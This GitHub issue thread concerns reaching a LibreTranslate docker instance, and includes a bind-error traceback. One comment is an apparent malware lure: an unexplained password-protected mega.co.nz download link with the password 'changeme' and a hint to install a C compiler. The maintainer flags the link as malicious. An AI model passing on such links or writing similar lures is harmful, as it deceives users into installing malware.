### ISSUE TITLE
What address I should request after running through docker?

### ISSUE THREAD

**Issue by wa008** [LibreTranslate/LibreTranslate#684]
My purpose is to use LibreTranslate as a translation API to replace Google Translation API.
I installed it in a VM through docker, After I install docker successfully,  I tried two times

1) if I run `./run.sh`
Result:
```
........
Downloading Spanish → English (1.0) ...
Downloading Spanish → Portuguese (1.0) ...
Downloading Swedish → English (1.5) ...
Downloading Tagalog → English (1.9) ...
Downloading Thai → English (1.9) ...
Downloading Turkish → English (1.5) ...
Downloading Ukranian → English (1.4) ...
Downloading Urdu → English (1.9) ...
Loaded support for 44 languages (88 models total)!
Running on http://*:5000
```
I request "http://[External IP address]:5000" through both browser and API, Both of these return nothing.

I don't know where I can request API.

2)  run `./run.sh --host="34.xx.xx.177"` with hout
I get Error:
```
Checking for docker...   found
Running on http://34.xx.xx.177:5000
Traceback (most recent call last):
  File "/app/./venv/bin/libretranslate", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/app/venv/lib/python3.11/site-packages/libretranslate/main.py", line 243, in main
    serve(
  File "/app/venv/lib/python3.11/site-packages/waitress/__init__.py", line 13, in serve
    server = _server(app, **kw)
             ^^^^^^^^^^^^^^^^^^
  File "/app/venv/lib/python3.11/site-packages/waitress/server.py", line 78, in create_server
    last_serv = TcpWSGIServer(
                ^^^^^^^^^^^^^^
  File "/app/venv/lib/python3.11/site-packages/waitress/server.py", line 244, in __init__
    self.bind_server_socket()
  File "/app/venv/lib/python3.11/site-packages/waitress/server.py", line 361, in bind_server_socket
    self.bind(sockaddr)
  File "/app/venv/lib/python3.11/site-packages/waitress/wasyncore.py", line 396, in bind
    return self.socket.bind(addr)
           ^^^^^^^^^^^^^^^^^^^^^^
OSError: [Errno 99] Cannot assign requested address
```

**Comment by SagarChandra07** [comment]
try this

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA

Password: changeme

you may need to install the c compiler

**Comment by wa008** [comment]
> try this
> 
> https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
> 
> Password: changeme
> 
> you may need to install the c compiler

What is this and why I need install c compiler after I install LibreTranslate successfully? 
Could you please provide more details?

**Comment by pierotofy** [comment]
@wa008 you don't need to install additional files; that link is malicious. If you have issues running LibreTranslate, open a conversation on https://community.libretranslate.com. GitHub is for reporting issues or feature requests.

@SagarChandra07: shame on you 🙅

**Comment by wa008** [comment]
@pierotofy Hi, Thanks for your informaiton.

I login LibreTranslate community through my google account and linked my github account, but I cannot find where to post a new topic, is there some limitation for new user to post?

**Comment by pierotofy** [comment]
@wa008 I've made some changes to your account; try now?

**Comment by wa008** [comment]
> @wa008 I've made some changes to your account; try now?

It works now, Thanks very much.
